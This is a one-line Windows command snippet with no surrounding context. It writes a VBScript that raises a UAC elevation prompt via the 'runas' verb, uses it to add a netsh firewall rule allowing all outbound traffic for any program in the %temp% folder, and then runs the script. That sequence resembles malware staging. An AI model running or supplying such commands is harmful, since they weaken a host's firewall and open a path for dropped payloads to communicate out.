Code:
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c netsh.exe advfirewall firewall add rule name="rule1" dir=out action=allow protocol=any program=""%temp%\*.*"", , "runas", 1 >>1b.vbs && 1b.vbs